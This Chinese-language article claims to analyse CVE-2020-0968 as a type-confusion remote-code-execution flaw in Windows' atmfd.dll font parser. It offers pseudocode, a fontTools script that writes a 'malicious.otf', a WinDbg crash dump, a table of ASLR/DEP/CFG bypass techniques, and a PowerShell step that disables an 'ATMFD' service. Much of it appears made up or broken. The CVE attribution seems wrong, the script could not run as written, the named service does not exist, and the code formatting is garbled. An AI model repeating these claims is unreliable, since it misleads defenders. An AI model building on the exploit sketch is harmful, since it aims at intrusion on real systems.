# 疑似CVE-2020-0968遠程代碼執行漏洞被發現的示例分析
## 摘要
本文針對2020年曝光的Windows字體解析引擎漏洞(CVE-2020-0968)進行技術分析,通過逆向工程、漏洞復現和利用鏈構建,揭示該遠程代碼執行(RCE)漏洞的觸發機制與潛在危害。文章包含漏洞背景、技術細節、PoC構造及緩解措施等內容。
---
## 1. 漏洞背景
### 1.1 漏洞基本信息
- **CVE編號**:CVE-2020-0968
- **漏洞類型**:遠程代碼執行(RCE)
- **影響組件**:Windows Adobe Type Manager庫(atmfd.dll)
- **影響系統**:Windows 7/8.1/10及Server版本
- **CVSS評分**:7.8(高危)
### 1.2 漏洞發現時間線
- **2020年4月**:微軟通過補丁星期二修復該漏洞
- **2020年5月**:第三方安全研究人員公開部分分析報告
- **2020年6月**:野外發現利用嘗試
---
## 2. 技術分析
### 2.1 漏洞原理
漏洞位于Windows字體解析引擎對特制OpenType字體(OTF)的處理過程中,當系統解析包含畸形`CHARSTRING`數據的字體文件時,`atmfd.dll`未正確處理內存對象,導致**類型混淆(Type Confusion)**。
#### 關鍵代碼路徑(逆向分析):
```cpp
// 偽代碼還原(基于atmfd.dll 5.1.2.229)
int ParseCharString(byte* fontData) {
int opcode = *fontData++;
switch(opcode) {
case 0x0F: // 危險操作碼
ObjectType* obj = (ObjectType*)fontData;
// 未驗證對象類型直接操作
obj->vtable->call(); // 觸發崩潰點
break;
// ...其他操作碼處理
}
}
fontTools庫from fontTools.ttLib import TTFont
font = TTFont()
# 注入畸形CHARSTRING數據
font["CFF "].cff.topDictIndex[0].CharStrings["A"] = b"\x0F" + b"\x41"*50 # 危險操作碼+填充數據
font.save("malicious.otf")
通過WinDbg捕獲的異常:
Access violation - code c0000005 (!!! second chance !!!)
atmfd!CF2Instance::Free + 0x12a:
00007ffa`1a1d3f2a 488b09 mov rcx,qword ptr [rcx] ds:41414141`41414141=?????????
| 防護機制 | 繞過方法 |
|---|---|
| ASLR | 堆噴射+字體對象重用 |
| DEP | ROP鏈調用VirtualAlloc |
| CFG | 劫持未受保護的vtable指針 |
微軟通過以下修改修復漏洞:
- 增加操作碼驗證(atmfd.dll 5.1.2.245)
- 隔離字體解析進程(Windows 10 2004+)
# 禁用ATM服務(可能影響老舊應用)
Stop-Service -Name "ATMFD" -Force
Set-Service -Name "ATMFD" -StartupType Disabled
